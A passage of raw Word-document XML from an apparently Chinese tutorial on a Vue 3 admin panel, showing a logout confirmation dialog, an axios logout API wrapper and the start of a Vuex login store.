        <w:t xml:space="preserve">        type: type,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53EE4270" w14:textId="77777777" w:rsidR="00E269F4" w:rsidRDefault="00E269F4" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        duration: duration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76779BD9" w14:textId="77777777" w:rsidR="00E269F4" w:rsidRDefault="00E269F4" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    })</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65A2D9E0" w14:textId="77777777" w:rsidR="00E269F4" w:rsidRDefault="00E269F4" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="338D64EE" w14:textId="77777777" w:rsidR="00E269F4" w:rsidRDefault="00E269F4" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5265D048" w14:textId="77777777" w:rsidR="00E269F4" w:rsidRPr="00E269F4" w:rsidRDefault="00E269F4" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E269F4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:r w:rsidRPr="00E269F4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>退出登录按钮</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26F4417C" w14:textId="77777777" w:rsidR="00E269F4" w:rsidRPr="00E269F4" w:rsidRDefault="00E269F4" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E269F4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>export function showModal(content = "</w:t>
      </w:r>
      <w:r w:rsidRPr="00E269F4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>提示内容</w:t>
      </w:r>
      <w:r w:rsidRPr="00E269F4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>", type = "warning", title = "", dangerouslyUseHTMLString = false) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0380F809" w14:textId="77777777" w:rsidR="00E269F4" w:rsidRPr="00E269F4" w:rsidRDefault="00E269F4" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E269F4">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">    return ElMessageBox.confirm(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05B81769" w14:textId="77777777" w:rsidR="00E269F4" w:rsidRPr="00E269F4" w:rsidRDefault="00E269F4" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E269F4">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">        content,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0266DC15" w14:textId="77777777" w:rsidR="00E269F4" w:rsidRPr="00E269F4" w:rsidRDefault="00E269F4" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E269F4">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">        {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F15C94D" w14:textId="77777777" w:rsidR="00E269F4" w:rsidRPr="00E269F4" w:rsidRDefault="00E269F4" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E269F4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">            confirmButtonText: '</w:t>
      </w:r>
      <w:r w:rsidRPr="00E269F4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>确定</w:t>
      </w:r>
      <w:r w:rsidRPr="00E269F4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41D8673E" w14:textId="77777777" w:rsidR="00E269F4" w:rsidRPr="00E269F4" w:rsidRDefault="00E269F4" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E269F4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">            cancelButtonText: '</w:t>
      </w:r>
      <w:r w:rsidRPr="00E269F4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>取消</w:t>
      </w:r>
      <w:r w:rsidRPr="00E269F4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25FD7EF5" w14:textId="77777777" w:rsidR="00E269F4" w:rsidRPr="00E269F4" w:rsidRDefault="00E269F4" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E269F4">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">            type,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08FC30C8" w14:textId="77777777" w:rsidR="00E269F4" w:rsidRPr="00E269F4" w:rsidRDefault="00E269F4" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E269F4">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DE82FD6" w14:textId="77777777" w:rsidR="00E269F4" w:rsidRPr="00E269F4" w:rsidRDefault="00E269F4" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E269F4">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">    )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F801402" w14:textId="77777777" w:rsidR="00E269F4" w:rsidRPr="00E269F4" w:rsidRDefault="00E269F4" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E269F4">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">        .then(() =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F8C86D0" w14:textId="77777777" w:rsidR="00E269F4" w:rsidRPr="00E269F4" w:rsidRDefault="00E269F4" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E269F4">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">            ElMessage({</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D1CBD97" w14:textId="77777777" w:rsidR="00E269F4" w:rsidRPr="00E269F4" w:rsidRDefault="00E269F4" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E269F4">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">                type: 'success',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32A23681" w14:textId="77777777" w:rsidR="00E269F4" w:rsidRPr="00E269F4" w:rsidRDefault="00E269F4" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E269F4">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">                message: 'Delete completed',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1411B4E1" w14:textId="77777777" w:rsidR="00E269F4" w:rsidRPr="00E269F4" w:rsidRDefault="00E269F4" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E269F4">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">            })</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0654D031" w14:textId="77777777" w:rsidR="00E269F4" w:rsidRPr="00E269F4" w:rsidRDefault="00E269F4" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E269F4">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">        })</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EC3A0F8" w14:textId="77777777" w:rsidR="00E269F4" w:rsidRPr="00E269F4" w:rsidRDefault="00E269F4" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E269F4">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">        .catch(() =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32033AA3" w14:textId="77777777" w:rsidR="00E269F4" w:rsidRPr="00E269F4" w:rsidRDefault="00E269F4" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E269F4">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">            ElMessage({</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40ED5276" w14:textId="77777777" w:rsidR="00E269F4" w:rsidRPr="00E269F4" w:rsidRDefault="00E269F4" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E269F4">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">                type: 'info',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B814B23" w14:textId="77777777" w:rsidR="00E269F4" w:rsidRPr="00E269F4" w:rsidRDefault="00E269F4" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E269F4">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">                message: 'Delete canceled',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A2C687D" w14:textId="77777777" w:rsidR="00E269F4" w:rsidRPr="00E269F4" w:rsidRDefault="00E269F4" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E269F4">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">            })</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74B1571A" w14:textId="77777777" w:rsidR="00E269F4" w:rsidRPr="00E269F4" w:rsidRDefault="00E269F4" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E269F4">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">        })</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F1EC31C" w14:textId="52677C87" w:rsidR="005F6D50" w:rsidRDefault="00E269F4" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00E269F4">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A2FBD79" w14:textId="77777777" w:rsidR="005F6D50" w:rsidRDefault="005F6D50" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="04849C8F" w14:textId="77777777" w:rsidR="005F6D50" w:rsidRDefault="005F6D50" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6E76C601" w14:textId="4A504820" w:rsidR="005F6D50" w:rsidRDefault="009F2D31" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>接口</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ECDD870" w14:textId="6B48D69E" w:rsidR="009F2D31" w:rsidRDefault="009F2D31" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>参考：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AED4E22" w14:textId="054A360A" w:rsidR="005C6B6E" w:rsidRDefault="005C6B6E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:hyperlink r:id="rId204" w:history="1">
        <w:r w:rsidRPr="00917655">
          <w:rPr>
            <w:rStyle w:val="a5"/>
          </w:rPr>
          <w:t>https://dishaxy.dishait.cn/shopadminapi/1.%E7%AE%A1%E7%90%86%E5%91%98%E7%AE%A1%E7%90%86/7.%E9%80%80%E5%87%BA%E7%99%BB%E5%BD%95.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="31E2B050" w14:textId="77777777" w:rsidR="005C6B6E" w:rsidRDefault="005C6B6E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="13DBF7B9" w14:textId="57F2AF99" w:rsidR="005C6B6E" w:rsidRPr="005C6B6E" w:rsidRDefault="005C6B6E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>即</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D970D12" w14:textId="38E38827" w:rsidR="005F6D50" w:rsidRDefault="009F2D31" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="009F2D31">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>http://ceshi13.dishait.cn/admin/logout</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06DD5D5C" w14:textId="77777777" w:rsidR="005F6D50" w:rsidRDefault="005F6D50" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="75534286" w14:textId="603E4D0C" w:rsidR="005F6D50" w:rsidRDefault="00FC5EA2" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>封装</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>logout</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>接口函数：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>manager</w:t>
      </w:r>
      <w:r>
        <w:t>.js</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="162C000D" w14:textId="77777777" w:rsidR="005F6D50" w:rsidRDefault="005F6D50" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="246ADD87" w14:textId="77777777" w:rsidR="00FC5EA2" w:rsidRPr="00FC5EA2" w:rsidRDefault="00FC5EA2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FC5EA2">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>export function logout(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32C141DC" w14:textId="77777777" w:rsidR="00FC5EA2" w:rsidRPr="00FC5EA2" w:rsidRDefault="00FC5EA2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FC5EA2">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">    return axios.post('/admin/logout')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="310A9F75" w14:textId="3B086924" w:rsidR="005F6D50" w:rsidRDefault="00FC5EA2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC5EA2">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F940FD6" w14:textId="77777777" w:rsidR="005F6D50" w:rsidRPr="00181907" w:rsidRDefault="005F6D50" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6E3077C1" w14:textId="05005D72" w:rsidR="005F6D50" w:rsidRDefault="00FC5EA2" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>用户状态新增登出动作：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>store/</w:t>
      </w:r>
      <w:r>
        <w:t>index.js</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="546F206C" w14:textId="77777777" w:rsidR="005F6D50" w:rsidRDefault="005F6D50" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2D5D64CE" w14:textId="77777777" w:rsidR="00FC5EA2" w:rsidRDefault="00FC5EA2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>import { createStore } from 'vuex'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72F0F30C" w14:textId="77777777" w:rsidR="00FC5EA2" w:rsidRDefault="00FC5EA2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>import { login, getinfo } from '~/api/manager'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20A906C0" w14:textId="77777777" w:rsidR="00FC5EA2" w:rsidRDefault="00FC5EA2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>import { setToken, removeToken } from '~/composables/auth'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F74C31A" w14:textId="77777777" w:rsidR="00FC5EA2" w:rsidRDefault="00FC5EA2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0D6D7DA3" w14:textId="77777777" w:rsidR="00FC5EA2" w:rsidRDefault="00FC5EA2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>创建一个新的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> store </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>实例</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C798ABD" w14:textId="77777777" w:rsidR="00FC5EA2" w:rsidRDefault="00FC5EA2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>const store = createStore({</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DCC5B2A" w14:textId="77777777" w:rsidR="00FC5EA2" w:rsidRDefault="00FC5EA2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    state() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43D22051" w14:textId="77777777" w:rsidR="00FC5EA2" w:rsidRDefault="00FC5EA2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        return {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F2E96E5" w14:textId="77777777" w:rsidR="00FC5EA2" w:rsidRDefault="00FC5EA2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">            // </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>用户信息</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="695FB65E" w14:textId="77777777" w:rsidR="00FC5EA2" w:rsidRDefault="00FC5EA2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">            user: {}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17E412A3" w14:textId="77777777" w:rsidR="00FC5EA2" w:rsidRDefault="00FC5EA2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23ABAC91" w14:textId="77777777" w:rsidR="00FC5EA2" w:rsidRDefault="00FC5EA2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    },</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C07F6BE" w14:textId="77777777" w:rsidR="00FC5EA2" w:rsidRDefault="00FC5EA2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    mutations: {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2891961D" w14:textId="77777777" w:rsidR="00FC5EA2" w:rsidRDefault="00FC5EA2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">        // </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>记录用户信息</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7438AE20" w14:textId="77777777" w:rsidR="00FC5EA2" w:rsidRDefault="00FC5EA2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        SET_USERINFO(state, user) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D7CE86D" w14:textId="77777777" w:rsidR="00FC5EA2" w:rsidRDefault="00FC5EA2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">            state.user = user</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BED7F87" w14:textId="77777777" w:rsidR="00FC5EA2" w:rsidRDefault="00FC5EA2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61424764" w14:textId="77777777" w:rsidR="00FC5EA2" w:rsidRDefault="00FC5EA2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    },</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46B9B027" w14:textId="77777777" w:rsidR="00FC5EA2" w:rsidRDefault="00FC5EA2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    actions: {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CA7A66D" w14:textId="77777777" w:rsidR="00FC5EA2" w:rsidRDefault="00FC5EA2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="26A890C5" w14:textId="77777777" w:rsidR="00FC5EA2" w:rsidRDefault="00FC5EA2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">        // </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>登录</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BC6A1FF" w14:textId="77777777" w:rsidR="00FC5EA2" w:rsidRDefault="00FC5EA2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">        login({ commit }, { username, password }) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E417199" w14:textId="77777777" w:rsidR="00FC5EA2" w:rsidRDefault="00FC5EA2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">            return new Promise((resolve, reject) =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FB0031A" w14:textId="77777777" w:rsidR="00FC5EA2" w:rsidRDefault="00FC5EA2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">                login(username, password)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E73D47D" w14:textId="77777777" w:rsidR="00FC5EA2" w:rsidRDefault="00FC5EA2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">                    .then(res =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CAB834C" w14:textId="77777777" w:rsidR="00FC5EA2" w:rsidRDefault="00FC5EA2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
